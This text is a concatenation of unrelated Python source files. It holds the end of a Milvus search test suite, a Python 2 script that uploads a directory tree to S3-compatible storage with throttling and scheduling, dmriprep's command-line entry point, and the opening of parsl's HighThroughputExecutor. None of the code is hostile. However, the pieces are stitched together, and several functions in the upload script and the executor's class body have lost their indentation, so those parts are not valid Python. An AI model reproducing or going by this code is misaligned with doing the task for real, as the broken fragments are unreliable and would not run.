        with pytest.raises(Exception) as e:
            res = connect.search(collection_name, default_query)
    @pytest.mark.skip("bigsheep-search-without-load")
    @pytest.mark.level(2)
    def test_search_with_invalid_partition(self, connect, collection, get_invalid_partition):
        # tag = " "
        tag = get_invalid_partition
        with pytest.raises(Exception) as e:
            res = connect.search(collection, default_query, partition_names=tag)
    @pytest.mark.skip("bigsheep-search-without-load")
    @pytest.mark.level(2)
    def test_search_with_invalid_field_name(self, connect, collection, get_invalid_field):
        fields = [get_invalid_field]
        with pytest.raises(Exception) as e:
            res = connect.search(collection, default_query, fields=fields)
    @pytest.mark.skip("bigsheep-search-without-load")
    @pytest.mark.level(1)
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_search_with_not_existed_field(self, connect, collection):
        # A syntactically valid but non-existent field name must also raise.
        fields = [gen_unique_str("field_name")]
        with pytest.raises(Exception) as e:
            res = connect.search(collection, default_query, fields=fields)
    """
    Test search collection with invalid query
    """
    @pytest.fixture(
        scope="function",
        params=gen_invalid_ints()
    )
    def get_top_k(self, request):
        yield request.param
    @pytest.mark.skip("bigsheep-search-without-load")
    @pytest.mark.level(1)
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_search_with_invalid_top_k(self, connect, collection, get_top_k):
        '''
        target: test search function, with the wrong top_k
        method: search with top_k
        expected: raise an error, and the connection is normal
        '''
        top_k = get_top_k
        # NOTE: this mutates the shared module-level default_query in place.
        default_query["bool"]["must"][0]["vector"][field_name]["topk"] = top_k
        with pytest.raises(Exception) as e:
            res = connect.search(collection, default_query)
    """
    Test search collection with invalid search params
    """
    @pytest.fixture(
        scope="function",
        params=gen_invaild_search_params()
    )
    def get_search_params(self, request):
        yield request.param
    # 1463
    @pytest.mark.level(2)
    def test_search_with_invalid_params(self, connect, collection, get_simple_index, get_search_params):
        '''
        target: test search function, with the wrong nprobe
        method: search with nprobe
        expected: raise an error, and the connection is normal
        '''
        search_params = get_search_params
        index_type = get_simple_index["index_type"]
        # Former skip conditions were disabled but kept for reference.
        if index_type in ["FLAT"]:
            # pytest.skip("skip in FLAT index")
            pass
        if index_type != search_params["index_type"]:
            # pytest.skip("skip if index_type not matched")
            pass
        entities, ids = init_data(connect, collection, nb=1200)
        connect.create_index(collection, field_name, get_simple_index)
        connect.load_collection(collection)
        query, vecs = gen_query_vectors(field_name, entities, default_top_k, 1,
                                        search_params=search_params["search_params"])
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    @pytest.mark.level(2)
    def test_search_with_invalid_params_binary(self, connect, binary_collection):
        '''
        target: test search function, with the wrong nprobe
        method: search with nprobe=0 on a binary index
        expected: raise an error, and the connection is normal
        '''
        nq = 1
        index_type = "BIN_IVF_FLAT"
        int_vectors, entities, ids = init_binary_data(connect, binary_collection)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        connect.create_index(binary_collection, binary_field_name,
                             {"index_type": index_type, "metric_type": "JACCARD", "params": {"nlist": 128}})
        connect.load_collection(binary_collection)
        # nprobe=0 is out of range for IVF-style indexes.
        query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
                                        search_params={"nprobe": 0}, metric_type="JACCARD")
        with pytest.raises(Exception) as e:
            res = connect.search(binary_collection, query)
    # #1464
    @pytest.mark.level(2)
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_search_with_empty_params(self, connect, collection, args, get_simple_index):
        '''
        target: test search function, with empty search params
        method: search with params
        expected: raise an error, and the connection is normal
        '''
        index_type = get_simple_index["index_type"]
        if args["handler"] == "HTTP":
            pytest.skip("skip in http mode")
        if index_type == "FLAT":
            # pytest.skip("skip in FLAT index")
            pass
        entities, ids = init_data(connect, collection)
        connect.create_index(collection, field_name, get_simple_index)
        connect.load_collection(collection)
        query, vecs = gen_query_vectors(field_name, entities, default_top_k, 1, search_params={})
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_search_with_empty_vectors(self, connect, collection):
        """
        target: test search function, with empty search vectors
        method: search
        expected: raise an exception
        """
        entities, ids = init_data(connect, collection)
        assert len(ids) == default_nb
        connect.load_collection(collection)
        # nq=0 produces a query with zero search vectors.
        query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq=0)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
class TestSearchWithExpression(object):
    """Smoke tests for search_with_expression over generated scalar filters."""
    @pytest.fixture(
        scope="function",
        params=[1, 10, 20],
    )
    def limit(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=gen_normal_expressions(),
    )
    def expression(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=[
            {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}},
        ]
    )
    def index_param(self, request):
        return request.param
    @pytest.fixture(
        scope="function",
    )
    def search_params(self):
        return {"metric_type": "L2", "params": {"nprobe": 10}}
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_search_with_expression(self, connect, collection, index_param, search_params, limit, expression):
        entities, ids = init_data(connect, collection)
        assert len(ids) == default_nb
        connect.create_index(collection, default_float_vec_field_name, index_param)
        connect.load_collection(collection)
        nq = 10
        # Use the first nq inserted vectors as queries; entities[2] is
        # presumably the float-vector field -- verify against init_data.
        query_data = entities[2]["values"][:nq]
        res = connect.search_with_expression(collection, query_data, default_float_vec_field_name, search_params,
                                             limit, expression)
        assert len(res) == nq
        for topk_results in res:
            # The filter may remove candidates, so each list is at most limit.
            assert len(topk_results) <= limit
def check_id_result(result, id, limit_in=5):
    """Return True when *id* appears among the first *limit_in* hits of *result*.

    Parameters
    ----------
    result : sequence of entities, each exposing an ``.id`` attribute
    id : the entity id to look for (name kept for backward compatibility,
        although it shadows the builtin)
    limit_in : int, optional
        How many leading hits to inspect (default 5, the original
        hard-coded value, now generalized into a parameter).
    """
    # Slicing past the end of a list yields the whole list, so the original
    # two-branch len() check collapses into a single expression.
    return id in [entity.id for entity in result[:limit_in]]
|
upload_directory.py | #!/usr/bin/env python2
# coding: utf-8
import datetime
import errno
import getopt
import logging
import os
import sys
import threading
import time
import yaml
import boto3
from boto3.s3.transfer import TransferConfig
from botocore.client import Config
from pykit import jobq
# Byte-size units.
MB = 1024**2
GB = 1024**3
# Float base used to scale the BANDWIDTH config value (see __main__); float
# so the division stays exact under Python 2 integer-division rules.
mega = 1024.0 * 1024.0
# Shared throttling state, guarded by uploaded_lock.  'max_upload_bytes' is
# added at startup in __main__ from cnf['BANDWIDTH'].
uploaded_lock = threading.RLock()
uploaded_per_second = {
    'start_time': time.time(),  # start of the current one-second window
    'uploading': 0,             # bytes already scheduled in this window
}
class RestrictUploadSpeed(object):
    """Per-file upload throttle, used as a boto3 upload progress callback.

    boto3 invokes the instance with the number of bytes just transferred;
    the callback blocks until that amount fits into the current one-second
    budget tracked in the module-level ``uploaded_per_second`` dict.
    """
    def __init__(self, fn):
        # fn: path of the file being uploaded, used only for log messages.
        self.fn = fn
    def __call__(self, bytes_amount):
        while True:
            curr_tm = time.time()
            with uploaded_lock:
                # Start a fresh one-second accounting window when the old
                # one has expired.
                if curr_tm - uploaded_per_second['start_time'] > 1:
                    uploaded_per_second['start_time'] = curr_tm
                    uploaded_per_second['uploading'] = 0
            with uploaded_lock:
                # Reserve this chunk if it still fits in the window's budget.
                if uploaded_per_second['max_upload_bytes'] - uploaded_per_second['uploading'] > bytes_amount:
                    uploaded_per_second['uploading'] += bytes_amount
                    break
            time.sleep(0.01)
            # NOTE(review): logged after the sleep, so "about to sleep" is
            # slightly misleading -- the sleep has already happened.
            logger.debug('about to sleep 10 millisecond to slow down, upload %d fn %s' % (
                bytes_amount, self.fn))
# Global upload statistics, guarded by stat_lock.
stat = {
    'bytes_uploaded': 0,
    'uploaded_files': 0,
    'start_time': time.time(),
}
stat_lock = threading.RLock()
# Serializes writes to the per-directory and total progress files.
flock = threading.RLock()
def to_unicode(s):
    """Decode a UTF-8 byte string to unicode; pass anything else through.

    NOTE: Python 2 only -- on Python 3, str has no .decode().
    """
    if isinstance(s, str):
        return s.decode('utf-8')
    return s
def to_utf8(s):
    """Encode a unicode string to UTF-8 bytes; pass anything else through.

    NOTE: Python 2 only -- ``unicode`` does not exist on Python 3.
    """
    if isinstance(s, unicode):
        return s.encode('utf-8')
    return s
def _thread(func, args):
th = threading.Thread(target=func, args=args)
th.daemon = True
th.start()
return th
def _mkdir(path):
try:
os.makedirs(path, 0755)
except OSError as e:
if e[0] == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def _remove(path):
try:
os.remove(path)
except OSError as e:
if e[0] == errno.ENOENT or os.path.isdir(path):
pass
else:
raise
def get_conf(conf_path):
    """Load the YAML config file and normalize its path entries to unicode.

    Returns the parsed config dict; DATA_DIR and LOG_DIR are decoded so that
    later path joins with decoded directory names don't mix str and unicode
    (Python 2 concern).
    """
    with open(conf_path) as f:
        conf = yaml.safe_load(f.read())
    conf['DATA_DIR'] = to_unicode(conf['DATA_DIR'])
    conf['LOG_DIR'] = to_unicode(conf['LOG_DIR'])
    return conf
def is_visible_dir(dir_name):
    """Treat dot-prefixed directory names as hidden."""
    return not dir_name.startswith('.')
def is_visible_file(file_name):
    """Treat dot-prefixed file names as hidden."""
    return not file_name.startswith('.')
def get_iso_now():
    """Current UTC time in compact ISO-8601 basic form, e.g. 20240101T120000Z."""
    return datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')
def dir_iter(dir_name, base_len, key_prefix):
    """Breadth-first generator over *dir_name* and its subdirectories.

    Yields one ``(dir_parts, base_len, key_prefix)`` job per directory; the
    jobs are consumed by upload_one_directory via jobq.  Hidden
    ('.'-prefixed) entries are skipped.  NOTE: Python 2 only (``unicode``).
    """
    q = []
    base_dir = dir_name.split('/')
    q.append(base_dir)
    while True:
        if len(q) < 1:
            break
        dir_parts = q.pop(0)
        files = os.listdir('/'.join(dir_parts))
        for f in files:
            _dir_parts = dir_parts[:]
            _dir_parts.append(f)
            if not is_visible_dir(f):
                continue
            # Normalize every path component to unicode before testing for a
            # directory: decode UTF-8 first, fall back to cp1252 for
            # legacy-encoded file names.
            parts = []
            for d in _dir_parts:
                if isinstance(d, unicode):
                    parts.append(d)
                    continue
                try:
                    d = d.decode('utf-8')
                except UnicodeDecodeError:
                    d = d.decode('cp1252')
                parts.append(d)
            if os.path.isdir('/'.join(parts)):
                q.append(parts)
        yield dir_parts, base_len, key_prefix
def get_files_to_upload(dir_name, progress_file):
    """Return the set of files in *dir_name* not yet recorded as uploaded.

    The progress file holds one line per completed upload, starting with the
    file path; any file listed there is removed from the result.  Returns a
    dict mapping file path -> True.  NOTE: Python 2 only (``str.decode``).
    """
    files = os.listdir(dir_name)
    files_to_upload = {}
    for f in files:
        if not is_visible_file(f):
            continue
        file_name = os.path.join(dir_name, f)
        if os.path.isfile(file_name):
            files_to_upload[file_name] = True
    # Touch the progress file so the read below never fails on first run.
    fd = open(progress_file, 'a')
    fd.close()
    fd = open(progress_file)
    while True:
        line = fd.readline()
        if line == '':
            break
        # First whitespace-separated token on each line is the file path.
        file_name = line.split()[0].decode('utf-8')
        if file_name in files_to_upload:
            files_to_upload.pop(file_name)
    fd.close()
    return files_to_upload
def upload_one_file(file_name, base_len, key_prefix, s3_client):
    """Upload a single file to S3 and verify it with a HEAD request.

    The object key is *key_prefix* plus the file path relative to the scan
    root (the first *base_len* path components are stripped).  Returns an
    info dict (key, etag, sizes, upload time), or None when the HEAD check
    fails.  Reads the module-level ``cnf`` config.
    """
    file_parts = file_name.split('/')
    key = os.path.join(key_prefix, '/'.join(file_parts[base_len:]))
    info = {'local_size': os.stat(file_name).st_size, }
    callback = None
    if cnf['ENABLE_BANDWIDTH']:
        # Throttle via the progress callback (see RestrictUploadSpeed).
        callback = RestrictUploadSpeed(file_name)
    config = TransferConfig(multipart_threshold=4 * GB,
                            multipart_chunksize=512 * MB)
    s3_client.upload_file(Filename=file_name,
                          Bucket=cnf['BUCKET_NAME'],
                          Key=key,
                          Config=config,
                          ExtraArgs={'ACL': cnf['FILE_ACL']},
                          Callback=callback,
                          )
    logger.warn('have uploaded file %s' % file_name)
    # HEAD the object to confirm the upload and fetch size/etag.
    resp = s3_client.head_object(
        Bucket=cnf['BUCKET_NAME'],
        Key=key
    )
    logger.warn('have headed file %s' % file_name)
    status = resp['ResponseMetadata']['HTTPStatusCode']
    if status != 200:
        logger.error('failed to put object: %s %d' % (key, status))
        return
    info['file_key'] = key
    info['etag'] = resp['ETag']
    info['resp_size'] = resp['ContentLength']
    info['upload_time'] = get_iso_now()
    return info
def boto_client():
    """Build a per-thread S3 client from the module-level ``cnf`` credentials.

    A fresh session per call keeps the clients thread-safe when used from
    jobq worker threads.  The endpoint and region are hard-coded for the
    target object-storage service.
    """
    session = boto3.session.Session()
    client = session.client(
        's3',
        use_ssl=False,
        aws_access_key_id=cnf['ACCESS_KEY'],
        aws_secret_access_key=cnf['SECRET_KEY'],
        config=Config(signature_version='s3v4'),
        region_name='us-east-1',
        endpoint_url='http://s2.i.qingcdn.com',
    )
    return client
def upload_one_directory(args):
    """Upload every pending file of one directory; jobq worker entry point.

    *args* is a ``(dir_parts, base_len, key_prefix)`` tuple produced by
    dir_iter.  Completed uploads are appended to the directory's
    ``.upload_progress`` file and to the global progress file, so an
    interrupted run resumes where it stopped.  NOTE: Python 2 only
    (``print`` statements).
    """
    s3_client = boto_client()
    dir_parts, base_len, key_prefix = args
    dir_name = '/'.join(dir_parts)
    progress_file = os.path.join(dir_name, '.upload_progress')
    files_to_upload = get_files_to_upload(dir_name, progress_file)
    progress_f = open(progress_file, 'a')
    print 'start to upload ' + dir_name
    logger.info('start to upload ' + dir_name)
    def _upload_file(file_name):
        # Per-file worker run by jobq with THREADS_NUM_FOR_FILE threads.
        if cnf['ENABLE_SCHEDULE']:
            check_schedule()
        logger.info('start to upload file: %s' % file_name)
        info = upload_one_file(file_name, base_len, key_prefix, s3_client)
        if info is None:
            return
        if info['local_size'] != info['resp_size']:
            logger.error(('file size not equal, local_size: %d,'
                          'response size: %d') % (info['local_size'],
                                                  info['resp_size']))
            return
        upload_time = get_iso_now()
        line = '%s %s %s %d %s\n' % (
            file_name, info['file_key'], info['etag'],
            info['local_size'], upload_time)
        line = to_utf8(line)
        # flock serializes writes to both progress files across threads.
        with flock:
            progress_f.write(line)
            total_progress_f.write(line)
            total_progress_f.flush()
        if cnf['CLEAR_FILES']:
            _remove(file_name)
        with stat_lock:
            stat['bytes_uploaded'] += info['local_size']
            stat['uploaded_files'] += 1
    jobq.run(files_to_upload.keys(), [
        (_upload_file, cnf['THREADS_NUM_FOR_FILE'])])
    progress_f.close()
    print 'finish to upload ' + dir_name
    logger.info('finish to upload ' + dir_name)
def report(sess):
last_report_tm = time.time()
last_uploaded_bytes = stat['bytes_uploaded']
while not sess['stop']:
ts_now = time.time()
with stat_lock:
time_used = ts_now - last_report_tm
added_bytes = stat['bytes_uploaded'] - last_uploaded_bytes
if added_bytes == 0 or time_used == 0:
continue
last_report_tm = ts_now
last_uploaded_bytes = stat['bytes_uploaded']
report_str = ('stat: bytes uploaded: %dMB, has uploaded files num: %d average speed: %fMB/s') % (
stat['bytes_uploaded'] / MB, stat['uploaded_files'], added_bytes / time_used / MB)
logger.info(report_str)
print report_str
time.sleep(cnf['REPORT_INTERVAL'])
def run_once(dir_name, key_prefix):
    """Walk *dir_name* once and upload everything not yet recorded as done.

    Validates the directory argument, starts the throughput-reporting
    thread, then fans directory jobs out to THREADS_NUM_FOR_DIR workers via
    jobq.  NOTE: Python 2 only (``print`` statements).
    """
    if dir_name.endswith('/'):
        print 'do not add / to the directory name: ' + dir_name
        return
    if not dir_name.startswith('/'):
        print 'the directory name is not absolute path: ' + dir_name
        return
    if not os.path.exists(dir_name) or not os.path.isdir(dir_name):
        print dir_name + ' is not exists or is not a directory'
        return
    # Number of path components to strip when building object keys.
    base_len = len(dir_name.split('/'))
    report_sess = {'stop': False}
    report_th = _thread(report, (report_sess,))
    jobq.run(dir_iter(dir_name, base_len, key_prefix),
             [(upload_one_directory, cnf['THREADS_NUM_FOR_DIR'])])
    # Signal the reporter to finish and wait for its final iteration.
    report_sess['stop'] = True
    report_th.join()
def run_forever(dir_name, key_prefix):
    """Re-scan and upload in an endless loop.

    When a full pass uploads nothing new, idle for a minute before the next
    scan to avoid hammering the filesystem.
    """
    while True:
        prev_uploaded = stat['bytes_uploaded']
        run_once(dir_name, key_prefix)
        if stat['bytes_uploaded'] - prev_uploaded == 0:
            time.sleep(60)
def check_schedule():
start_h = int(cnf['SCHEDULE_START'].split(':')[0])
start_m = int(cnf['SCHEDULE_START'].split(':')[1])
stop_h = int(cnf['SCHEDULE_STOP'].split(':')[0])
stop_m = int(cnf['SCHEDULE_STOP'].split(':')[1])
start_m = start_m + start_h * 60
stop_m = stop_m + stop_h * 60
while True:
now = datetime.datetime.now()
now_h = now.hour
now_m = now.minute
now_m = now_m + now_h * 60
if start_m < stop_m:
if now_m >= start_m and now_m <= stop_m:
return
else:
wait_m = (start_m - now_m) % (60 * 24)
line = ('the schedule is from %s to %s,'
' need to wait %d hours and %d minutes') % (
cnf['SCHEDULE_START'], cnf['SCHEDULE_STOP'],
wait_m / 60, wait_m % 60)
print line
logger.warn(line)
time.sleep(60)
else:
if now_m > stop_m and now_m < start_m:
wait_m = (start_m - now_m) % (60 * 24)
line = ('the schedule is from %s to %s,'
' need to wait %d hours and %d minutes') % (
cnf['SCHEDULE_START'], cnf['SCHEDULE_STOP'],
wait_m / 60, wait_m % 60)
print line
logger.warn(line)
time.sleep(60)
else:
return
def add_logger():
    """Attach a per-data-directory file handler to the root logger at INFO level."""
    log_name = 'upload-log-for' + cnf['DATA_DIR'].replace('/', '_') + '.log'
    root_logger = logging.getLogger()
    root_logger.setLevel(logging.INFO)
    handler = logging.FileHandler(os.path.join(cnf['LOG_DIR'], log_name))
    handler.setFormatter(
        logging.Formatter('[%(asctime)s, %(levelname)s] %(message)s'))
    root_logger.addHandler(handler)
    return root_logger
if __name__ == "__main__":
    # Single optional flag: --conf <path>; default to the bundled config.
    opts, args = getopt.getopt(sys.argv[1:], '', ['conf=', ])
    opts = dict(opts)
    if opts.get('--conf') is None:
        conf_path = '../conf/upload_directory.yaml'
    else:
        conf_path = opts['--conf']
    cnf = get_conf(conf_path)
    # BANDWIDTH is divided by 8, so it is presumably configured in
    # megabits/s and converted here to bytes/s -- confirm against the config.
    uploaded_per_second['max_upload_bytes'] = float(
        cnf['BANDWIDTH']) * mega / 8
    _mkdir(cnf['LOG_DIR'])
    logger = add_logger()
    # Global progress file shared by all directory workers (see flock).
    fn = os.path.join(cnf['LOG_DIR'], 'upload-progress-for' +
                      cnf['DATA_DIR'].replace('/', '_') + '.log')
    total_progress_f = open(fn, 'a')
    if cnf['RUN_FOREVER']:
        run_forever(cnf['DATA_DIR'], cnf['KEY_PREFIX'])
    else:
        run_once(cnf['DATA_DIR'], cnf['KEY_PREFIX'])
    total_progress_f.close()
|
run.py | #!/usr/bin/env python
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
#
# Copyright 2021 The NiPreps Developers <nipreps@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# We support and encourage derived works from this project, please read
# about our expectations at
#
# https://www.nipreps.org/community/licensing/
#
"""dMRI preprocessing workflow."""
from .. import config
def main():
    """Entry point: parse args, build the workflow in a subprocess, run it.

    BUG FIX: the usage-tracking notice was passed to ``Logger.info`` as four
    separate positional arguments.  ``logging`` treats extra positionals as
    %-format arguments; with no placeholders in the message this raises
    "not all arguments converted during string formatting" when the record
    is emitted.  The pieces are now joined by implicit string concatenation.
    """
    import os
    import sys
    import gc
    from multiprocessing import Process, Manager
    from .parser import parse_args
    from ..utils.bids import write_derivative_description
    parse_args()
    popylar = None
    if not config.execution.notrack:
        import popylar
        from ..__about__ import __ga_id__
        config.loggers.cli.info(
            "Your usage of dmriprep is being recorded using popylar (https://popylar.github.io/). "  # noqa
            "For details, see https://nipreps.github.io/dmriprep/usage.html. "
            "To opt out, call dmriprep with a `--notrack` flag"
        )
        popylar.track_event(__ga_id__, "run", "cli_run")
    # CRITICAL Save the config to a file. This is necessary because the execution graph
    # is built as a separate process to keep the memory footprint low. The most
    # straightforward way to communicate with the child process is via the filesystem.
    config_file = config.execution.work_dir / ".dmriprep.toml"
    config.to_filename(config_file)
    # CRITICAL Call build_workflow(config_file, retval) in a subprocess.
    # Because Python on Linux does not ever free virtual memory (VM), running the
    # workflow construction jailed within a process preempts excessive VM buildup.
    with Manager() as mgr:
        from .workflow import build_workflow
        retval = mgr.dict()
        p = Process(target=build_workflow, args=(str(config_file), retval))
        p.start()
        p.join()
        # A non-zero exit code wins; otherwise trust the child's reported code.
        retcode = p.exitcode or retval.get("return_code", 0)
        dmriprep_wf = retval.get("workflow", None)
    # CRITICAL Load the config from the file. This is necessary because the ``build_workflow``
    # function executed constrained in a process may change the config (and thus the global
    # state of dMRIPrep).
    config.load(config_file)
    if config.execution.reports_only:
        sys.exit(int(retcode > 0))
    if dmriprep_wf and config.execution.write_graph:
        dmriprep_wf.write_graph(graph2use="colored", format="svg", simple_form=True)
    # A missing workflow is a software error even when retcode was 0.
    retcode = retcode or (dmriprep_wf is None) * os.EX_SOFTWARE
    if retcode != 0:
        sys.exit(retcode)
    # Generate boilerplate
    with Manager() as mgr:
        from .workflow import build_boilerplate
        p = Process(target=build_boilerplate, args=(str(config_file), dmriprep_wf))
        p.start()
        p.join()
    if config.execution.boilerplate_only:
        sys.exit(int(retcode > 0))
    # Clean up master process before running workflow, which may create forks
    gc.collect()
    if popylar is not None:
        popylar.track_event(__ga_id__, "run", "started")
    config.loggers.workflow.log(
        15,
        "\n".join(
            ["dMRIPrep config:"] + ["\t\t%s" % s for s in config.dumps().splitlines()]
        ),
    )
    config.loggers.workflow.log(25, "dMRIPrep started!")
    errno = 1  # Default is error exit unless otherwise set
    try:
        dmriprep_wf.run(**config.nipype.get_plugin())
    except Exception as e:
        if not config.execution.notrack:
            popylar.track_event(__ga_id__, "run", "error")
        config.loggers.workflow.critical("dMRIPrep failed: %s", e)
        raise
    else:
        config.loggers.workflow.log(25, "dMRIPrep finished successfully!")
        # Bother users with the boilerplate only iff the workflow went okay.
        if (config.execution.output_dir / "dmriprep" / "logs" / "CITATION.md").exists():
            config.loggers.workflow.log(
                25,
                "Works derived from this dMRIPrep execution should "
                "include the following boilerplate: "
                f"{config.execution.output_dir / 'dmriprep' / 'logs' / 'CITATION.md'}.",
            )
        if config.workflow.run_reconall:
            from templateflow import api
            from niworkflows.utils.misc import _copy_any
            # Ship the FreeSurfer segmentation label tables with the outputs.
            dseg_tsv = str(api.get("fsaverage", suffix="dseg", extension=[".tsv"]))
            _copy_any(
                dseg_tsv,
                str(config.execution.output_dir / "dmriprep" / "desc-aseg_dseg.tsv"),
            )
            _copy_any(
                dseg_tsv,
                str(
                    config.execution.output_dir / "dmriprep" / "desc-aparcaseg_dseg.tsv"
                ),
            )
        errno = 0
    finally:
        from niworkflows.reports import generate_reports
        from pkg_resources import resource_filename as pkgrf
        # Generate reports phase
        failed_reports = generate_reports(
            config.execution.participant_label,
            config.execution.output_dir,
            config.execution.run_uuid,
            config=pkgrf("dmriprep", "config/reports-spec.yml"),
            packagename="dmriprep",
        )
        write_derivative_description(
            config.execution.bids_dir, config.execution.output_dir / "dmriprep"
        )
        if failed_reports and not config.execution.notrack:
            popylar.track_event(__ga_id__, "run", "reporting_error")
        sys.exit(int((errno + failed_reports) > 0))
if __name__ == "__main__":
    # Direct execution is unsupported: the package-relative imports above
    # (``from .. import config``) only resolve when dmriprep is installed
    # and invoked through its console entry point.
    raise RuntimeError(
        "dmriprep/cli/run.py should not be run directly;\n"
        "Please `pip install` dmriprep and use the `dmriprep` command"
    )
|
executor.py | """HighThroughputExecutor builds on the Swift/T EMEWS architecture to use MPI for fast task distribution
"""
from concurrent.futures import Future
import typeguard
import logging
import threading
import queue
import pickle
from multiprocessing import Process, Queue
from typing import Dict, List, Optional, Tuple, Union
import math
from ipyparallel.serialize import pack_apply_message # ,unpack_apply_message
from ipyparallel.serialize import deserialize_object # ,serialize_object
from parsl.app.errors import RemoteExceptionWrapper
from parsl.executors.high_throughput import zmq_pipes
from parsl.executors.high_throughput import interchange
from parsl.executors.errors import BadMessage, ScalingFailed, DeserializationError
from parsl.executors.base import ParslExecutor
from parsl.providers.provider_base import ExecutionProvider
from parsl.data_provider.staging import Staging
from parsl.utils import RepresentationMixin
from parsl.providers import LocalProvider
logger = logging.getLogger(__name__)
# NOTE(review): neither constant is referenced in this chunk; presumably
# serialization cutoffs (bytes / item count) used elsewhere -- TODO confirm.
BUFFER_THRESHOLD = 1024 * 1024
ITEM_THRESHOLD = 1024
class HighThroughputExecutor(ParslExecutor, RepresentationMixin):
"""Executor designed for cluster-scale
The HighThroughputExecutor system has the following components:
1. The HighThroughputExecutor instance which is run as part of the Parsl script.
2. The Interchange which is acts as a load-balancing proxy between workers and Parsl
3. The multiprocessing based worker pool which coordinates task execution over several
cores on a node.
4. ZeroMQ pipes connect the HighThroughputExecutor, Interchange and the process_worker_pool
Here is a diagram
.. code:: python
| Data | Executor | Interchange | External Process(es)
| Flow | | |
Task | Kernel | | |
+----->|-------->|------------>|->outgoing_q---|-> process_worker_pool
| | | | batching | | |
Parsl<---Fut-| | | load-balancing| result exception
^ | | | watchdogs | | |
| | | Q_mngmnt | | V V
| | | Thread<--|-incoming_q<---|--- +---------+
| | | | | |
| | | | | |
+----update_fut-----+
Parameters
----------
provider : :class:`~parsl.providers.provider_base.ExecutionProvider`
Provider to access computation resources. Can be one of :class:`~parsl.providers.aws.aws.EC2Provider`,
:class:`~parsl.providers.cobalt.cobalt.Cobalt`,
:class:`~parsl.providers.condor.condor.Condor`,
:class:`~parsl.providers.googlecloud.googlecloud.GoogleCloud`,
:class:`~parsl.providers.gridEngine.gridEngine.GridEngine`,
:class:`~parsl.providers.jetstream.jetstream.Jetstream`,
:class:`~parsl.providers.local.local.Local`,
:class:`~parsl.providers.sge.sge.GridEngine`,
:class:`~parsl.providers.slurm.slurm.Slurm`, or
:class:`~parsl.providers.torque.torque.Torque`.
label : str
Label for this executor instance.
launch_cmd : str
Command line string to launch the process_worker_pool from the provider. The command line string
will be formatted with appropriate values for the following values (debug, task_url, result_url,
cores_per_worker, nodes_per_block, heartbeat_period ,heartbeat_threshold, logdir). For eg:
launch_cmd="process_worker_pool.py {debug} -c {cores_per_worker} --task_url={task_url} --result_url={result_url}"
address : string
An address to connect to the main Parsl process which is reachable from the network in which
workers will be running. This can be either a hostname as returned by `hostname` or an
IP address. Most login nodes on clusters have several network interfaces available, only
some of which can be reached from the compute nodes. Some trial and error might be
necessary to indentify what addresses are reachable from compute nodes.
worker_ports : (int, int)
Specify the ports to be used by workers to connect to Parsl. If this option is specified,
worker_port_range will not be honored.
worker_port_range : (int, int)
Worker ports will be chosen between the two integers provided.
interchange_port_range : (int, int)
Port range used by Parsl to communicate with the Interchange.
working_dir : str
Working dir to be used by the executor.
worker_debug : Bool
Enables worker debug logging.
managed : Bool
If this executor is managed by the DFK or externally handled.
cores_per_worker : float
cores to be assigned to each worker. Oversubscription is possible
by setting cores_per_worker < 1.0. Default=1
mem_per_worker : float
GB of memory required per worker. If this option is specified, the node manager
will check the available memory at startup and limit the number of workers such that
the there's sufficient memory for each worker. Default: None
max_workers : int
Caps the number of workers launched by the manager. Default: infinity
prefetch_capacity : int
Number of tasks that could be prefetched over available worker capacity.
When there are a few tasks (<100) or when tasks are long running, this option should
be set to 0 for better load balancing. Default is 0.
suppress_failure : Bool
If set, the interchange will suppress failures rather than terminate early. Default: False
heartbeat_threshold : int
Seconds since the last message from the counterpart in the communication pair:
(interchange, manager) after which the counterpart is assumed to be un-available. Default:120s
heartbeat_period : int
Number of seconds after which a heartbeat message indicating liveness is sent to the
counterpart (interchange, manager). Default:30s
poll_period : int
Timeout period to be used by the executor components in milliseconds. Increasing poll_periods
trades performance for cpu efficiency. Default: 10ms
worker_logdir_root : string
In case of a remote file system, specify the path to where logs will be kept.
"""
@typeguard.typechecked
def __init__(self,
             label: str = 'HighThroughputExecutor',
             provider: ExecutionProvider = LocalProvider(),
             launch_cmd: Optional[str] = None,
             address: str = "127.0.0.1",
             worker_ports: Optional[Tuple[int, int]] = None,
             worker_port_range: Optional[Tuple[int, int]] = (54000, 55000),
             interchange_port_range: Optional[Tuple[int, int]] = (55000, 56000),
             storage_access: Optional[List[Staging]] = None,
             working_dir: Optional[str] = None,
             worker_debug: bool = False,
             cores_per_worker: float = 1.0,
             mem_per_worker: Optional[float] = None,
             max_workers: Union[int, float] = float('inf'),
             prefetch_capacity: int = 0,
             heartbeat_threshold: int = 120,
             heartbeat_period: int = 30,
             poll_period: int = 10,
             suppress_failure: bool = False,
             managed: bool = True,
             worker_logdir_root: Optional[str] = None):
    """Initialize the executor; see the class docstring for parameter details."""
    logger.debug("Initializing HighThroughputExecutor")

    self.label = label
    self.launch_cmd = launch_cmd
    self.provider = provider
    self.worker_debug = worker_debug
    self.storage_access = storage_access
    self.working_dir = working_dir
    self.managed = managed
    self.blocks = {}  # type: Dict[str, str]
    self.tasks = {}  # type: Dict[str, Future]
    self.cores_per_worker = cores_per_worker
